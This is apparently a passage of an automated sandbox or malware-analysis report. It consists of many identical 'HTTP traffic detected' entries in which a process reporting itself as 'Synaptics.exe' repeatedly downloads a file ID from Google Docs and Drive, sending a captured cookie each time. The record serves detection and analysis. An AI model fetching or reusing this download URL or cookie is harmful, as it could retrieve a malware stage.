                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
